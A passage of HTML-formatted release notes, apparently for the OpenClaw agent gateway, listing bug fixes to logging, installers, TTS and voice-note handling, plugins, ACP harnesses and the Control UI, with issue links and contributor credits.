href="https://github.com/zsjlovelike">@zsjlovelike</a>.</li>
<li>Logging: rotate file logs at <code>logging.maxFileBytes</code>, keep bounded numbered archives, and make long-lived rolling loggers follow the current-day file instead of suppressing diagnostics or writing stale dated files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182641485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58583/hovercard" href="https://github.com/openclaw/openclaw/issues/58583">#58583</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216327509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62381" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62381/hovercard" href="https://github.com/openclaw/openclaw/issues/62381">#62381</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpeghead/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpeghead">@jpeghead</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhaoleink/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhaoleink">@zhaoleink</a>.</li>
<li>Agents/groups: treat clean empty assistant stops as silent <code>NO_REPLY</code> only for always-on groups where silent replies are allowed, while keeping direct and mention-gated sessions on the incomplete-turn retry path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>macOS/Node: keep native remote app nodes from advertising <code>browser.proxy</code>, start browser-capable CLI node services through the restored <code>openclaw node start</code> command, and show an actionable browser-control error when the local control service is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263105927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66637" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66637/hovercard" href="https://github.com/openclaw/openclaw/issues/66637">#66637</a>.</li>
<li>Gateway/update: fail package updates when the restarted managed gateway reports the wrong version, including fallback restarts and JSON mode, avoiding false-success mixed-version restarts after macOS LaunchAgent updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Gateway/update: warn before package updates and bundled plugin runtime-dependency repairs when the target volume appears low on disk space, without blocking installs on best-effort filesystem checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329551146" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71835/hovercard" href="https://github.com/openclaw/openclaw/issues/71835">#71835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinas90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinas90">@abhinas90</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jsompis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jsompis">@jsompis</a>.</li>
<li>Plugins/runtime deps: surface activated plugin load failures in health and fail package-update restart verification or doctor repair when bundled runtime deps still cannot load, avoiding false-success repairs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Gateway/Linux: include fnm <code>aliases/default/bin</code> in generated service PATHs and let doctor accept either modern fnm aliases or the legacy <code>current/bin</code> symlink, avoiding false PATH repair prompts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283558641" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68169" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68169/hovercard" href="https://github.com/openclaw/openclaw/issues/68169">#68169</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/richard-scott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/richard-scott">@richard-scott</a>.</li>
<li>Installer/Linux: run apt installs with noninteractive dpkg and needrestart settings so fresh Ubuntu 24.04 <code>curl | bash</code> installs do not hang while installing Node.js, Git, or build tools. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046027578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41146" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41146/hovercard" href="https://github.com/openclaw/openclaw/issues/41146">#41146</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iht76/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iht76">@iht76</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexcarv318/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexcarv318">@alexcarv318</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cs3gallery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cs3gallery">@cs3gallery</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/firofame/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/firofame">@firofame</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>.</li>
<li>Providers/Bedrock: defer the AWS SDK import until Bedrock discovery actually runs so plugin registration and setup stay lightweight on cold start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328833605" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71690/hovercard" href="https://github.com/openclaw/openclaw/issues/71690">#71690</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-ai-gregmoser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-ai-gregmoser">@jarvis-ai-gregmoser</a>.</li>
<li>Installer/macOS: stop immediately when Homebrew <code>node@24</code> installation fails and avoid printing PATH advice for missing Homebrew Node installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a>.</li>
<li>WhatsApp: remove ack reactions after a visible reply when <code>messages.removeAckAfterReply</code> is enabled, matching other reaction-capable channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3987412583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/26183" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/26183/hovercard" href="https://github.com/openclaw/openclaw/issues/26183">#26183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrUnforsaken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrUnforsaken">@MrUnforsaken</a>.</li>
<li>Providers/Z.AI: map OpenClaw thinking controls to Z.AI's <code>thinking</code> payload and add opt-in preserved thinking replay via <code>params.preserveThinking</code>, so GLM 5.x can keep prior <code>reasoning_content</code> when requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183616844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58680" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58680/hovercard" href="https://github.com/openclaw/openclaw/issues/58680">#58680</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuanmingguo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuanmingguo">@xuanmingguo</a>.</li>
<li>Channels/status: keep read-only channel lists on manifest and package metadata by default, loading setup runtime only for explicit fallback callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins: scope setup and web-provider metadata manifest reads to explicit plugin ids when callers already know the owning plugin set. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/onboarding: defer onboarding install-record index writes until the guarded config commit so setup failures cannot leave the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/registry: resolve web provider ownership from the installed plugin index instead of broad manifest scans on secret, tool, and pricing paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Config/providers: accept <code>video</code> and <code>audio</code> in configured model <code>input</code> values and preserve them in provider catalog entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3961456155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/20721" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/20721/hovercard" href="https://github.com/openclaw/openclaw/issues/20721">#20721</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>.</li>
<li>Models/auth: honor the parent <code>--agent</code> flag for auth write commands (<code>add</code>, <code>login</code>, <code>setup-token</code>, <code>paste-token</code>, and the GitHub Copilot shortcut) so OAuth/API-key/token results are written to the requested agent store instead of the default agent. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329713315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71864/hovercard" href="https://github.com/openclaw/openclaw/issues/71864">#71864</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329952100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71933" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71933/hovercard" href="https://github.com/openclaw/openclaw/pull/71933">#71933</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/balric-seo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/balric-seo">@balric-seo</a>.</li>
<li>TTS: strip model-emitted TTS directives from streamed block text before channel delivery, including directives split across adjacent blocks, while preserving the accumulated raw reply for final-mode synthesis. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4038643518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38937/hovercard" href="https://github.com/openclaw/openclaw/issues/38937">#38937</a>.</li>
<li>TTS: keep explicit <code>provider=...</code> directive keys scoped to that provider and warn on unsupported keys instead of letting another speech provider consume overlapping keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198945704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60131/hovercard" href="https://github.com/openclaw/openclaw/issues/60131">#60131</a>.</li>
<li>TTS/Feishu: normalize final-mode streamed TTS-only audio before delivery so generated voice-note files use the same safe media path and native voice routing as normal final replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329908441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71920/hovercard" href="https://github.com/openclaw/openclaw/issues/71920">#71920</a>.</li>
<li>Feishu: transcribe inbound voice-note audio with the shared media audio path before agent dispatch and keep raw Feishu <code>file_key</code> payloads out of message text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268134631" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67120/hovercard" href="https://github.com/openclaw/openclaw/issues/67120">#67120</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4211680654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61876" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61876/hovercard" href="https://github.com/openclaw/openclaw/issues/61876">#61876</a>.</li>
<li>Tasks: terminalize async Gateway agent task records from the Gateway run result while preserving aborted, failed, and cancelled outcomes instead of leaving completed runs stuck as active or lost. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329869944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71905" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71905/hovercard" href="https://github.com/openclaw/openclaw/pull/71905">#71905</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>WhatsApp: let authorized group voice-note transcripts satisfy mention gating before reply dispatch, while keeping unmentioned transcripts in pending group history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069891043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44908/hovercard" href="https://github.com/openclaw/openclaw/issues/44908">#44908</a>.</li>
<li>Media understanding: carry channel voice-note preflight state into attachment selection so WhatsApp, Feishu, Telegram, and Discord do not transcribe the same inbound audio twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315503496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70580/hovercard" href="https://github.com/openclaw/openclaw/issues/70580">#70580</a>.</li>
<li>TTS/BlueBubbles: deliver compatible auto-TTS audio as iMessage voice memo bubbles instead of plain MP3/CAF file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3943170481" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/16848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/16848/hovercard" href="https://github.com/openclaw/openclaw/issues/16848">#16848</a>.</li>
<li>TTS: resolve voice-note and voice-memo routing from channel plugin capabilities instead of speech-core-owned channel id lists.</li>
<li>ACP: send subagent and async-task completion wakes to external ACP harnesses as plain prompts instead of OpenClaw internal runtime-context envelopes, while keeping those envelopes out of ACP transcripts.</li>
<li>TTS/status: show configured TTS model, voice, and sanitized custom endpoint in <code>/status</code>, preserve OpenAI-compatible TTS instructions on custom endpoints, and retry empty Microsoft/Edge TTS output once. Addresses <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076830177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46602/hovercard" href="https://github.com/openclaw/openclaw/issues/46602">#46602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078185482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47232" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47232/hovercard" href="https://github.com/openclaw/openclaw/pull/47232">#47232</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063664533" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43936/hovercard" href="https://github.com/openclaw/openclaw/pull/43936">#43936</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leekuangtao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leekuangtao">@leekuangtao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Huntterxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Huntterxx">@Huntterxx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex993">@rex993</a>.</li>
<li>Agents/Gateway: steer agent-driven config edits and restarts through the owner-only <code>gateway</code> tool, document <code>config.schema.lookup</code> as the field-doc source, and warn against using <code>gateway stop &amp;&amp; gateway start</code> as a restart substitute on macOS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329939344" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71929" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71929/hovercard" href="https://github.com/openclaw/openclaw/issues/71929">#71929</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygc3817922006-sketch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygc3817922006-sketch">@ygc3817922006-sketch</a>.</li>
<li>Media understanding/audio: inject a deterministic transcript placeholder for too-small voice notes so agents do not hallucinate transcription or provider failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087777845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48944/hovercard" href="https://github.com/openclaw/openclaw/issues/48944">#48944</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eulicesl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eulicesl">@eulicesl</a>.</li>
<li>Providers/vLLM: send Nemotron 3 chat-template kwargs when thinking is off and honor configured <code>params.chat_template_kwargs</code> for OpenAI-compatible completions, so vLLM/Nemotron replies stay visible instead of becoming thinking-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329813098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71891" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71891/hovercard" href="https://github.com/openclaw/openclaw/issues/71891">#71891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dennis-lynch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dennis-lynch">@dennis-lynch</a>.</li>
<li>Channels/replies: strip copied inbound metadata blocks from user-facing assistant replies and model replay history, so Discord/vLLM sessions do not leak <code>Conversation info</code> / <code>UNTRUSTED ... message body</code> envelopes after a model echoes them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329636801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71847/hovercard" href="https://github.com/openclaw/openclaw/issues/71847">#71847</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a>.</li>
<li>Subagents/memory: keep inter-session completion wakes out of memory and dreaming session exports, and strip internal runtime-context blocks from realtime Control UI chat events.</li>
<li>Agents/Claude: treat zero-token empty <code>stop</code> turns as failed provider output, retry once, repair replay, and allow configured model fallback instead of preserving them as successful silent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71880/hovercard" href="https://github.com/openclaw/openclaw/issues/71880">#71880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>Tasks: normalize task lifecycle timestamps at create, update, and restore time, and report retained lost tasks as audit warnings until their cleanup window expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329725948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71871/hovercard" href="https://github.com/openclaw/openclaw/pull/71871">#71871</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>Diagnostics/OTEL: treat normal early model stream cleanup as a completed model call instead of exporting a misleading <code>StreamAbandoned</code> error span. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/pairing: stop corrupt or unreadable device/node pairing stores from being treated as empty state, preserving <code>paired.json</code> for repair instead of overwriting approved pairings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329738661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71873" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71873/hovercard" href="https://github.com/openclaw/openclaw/issues/71873">#71873</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iret77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iret77">@iret77</a>.</li>
<li>ACP: keep <code>/acp</code> management commands, plus local <code>/status</code> and <code>/unfocus</code>, on the Gateway path inside ACP-bound threads so they are not consumed as ACP prompt text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259260856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66298/hovercard" href="https://github.com/openclaw/openclaw/issues/66298">#66298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>.</li>
<li>ACPX: stop probing ACP agents during normal Gateway startup; the embedded backend now registers without spawning Codex/ACP child processes unless <code>OPENCLAW_ACPX_RUNTIME_STARTUP_PROBE=1</code> is explicitly set.</li>
<li>CLI/image edit: accept <code>--size</code>, <code>--aspect-ratio</code>, and <code>--resolution</code> on <code>openclaw infer image edit</code> and report all supported edit flags from <code>capability inspect image.edit</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pinghuachiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pinghuachiu">@Pinghuachiu</a>.</li>
<li>ACP: wait for the configured runtime backend to become healthy before startup identity reconciliation, avoiding transient acpx warnings during Gateway boot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043233380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40566" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40566/hovercard" href="https://github.com/openclaw/openclaw/issues/40566">#40566</a>.</li>
<li>Channels/ACP bindings: time out configured binding readiness checks instead of letting Discord preflight hang forever when an ACP target never settles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289732408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68776/hovercard" href="https://github.com/openclaw/openclaw/issues/68776">#68776</a>.</li>
<li>Control UI: hide the chat loading skeleton during background history reloads when existing messages or active stream content are already visible, avoiding reload flashes on high-latency local gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329620242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71844" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71844/hovercard" href="https://github.com/openclaw/openclaw/issues/71844">#71844</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep locally optimistic chat messages visible when a history reload temporarily returns empty, avoiding lost first-turn messages on high-latency gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329761362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71878/hovercard" href="https://github.com/openclaw/openclaw/issues/71878">#71878</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep chat history limits based on visible messages after filtering heartbeat and control-only transcript rows, so recent hidden entries no longer make older visible replies disappear. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/images: scrub old <code>[media attached: ...]</code>, <code>[Image: source: ...]</code>, and <code>media://inbound/...</code> markers from pruned model replay context so stale media refs are not rehydrated as fresh prompt images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329723266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71868/hovercard" href="https://github.com/openclaw/openclaw/issues/71868">#71868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmeadlock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmeadlock">@jmeadlock</a>.</li>
<li>Docker/Bonjour: disable Bonjour/mDNS advertising by default for bundled Compose gateways on bridge networking, while keeping host/macvlan opt-in with <code>OPENCLAW_DISABLE_BONJOUR=0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71879/hovercard" href="https://github.com/openclaw/openclaw/issues/71879">#71879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gbballpack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gbballpack">@gbballpack</a>.</li>
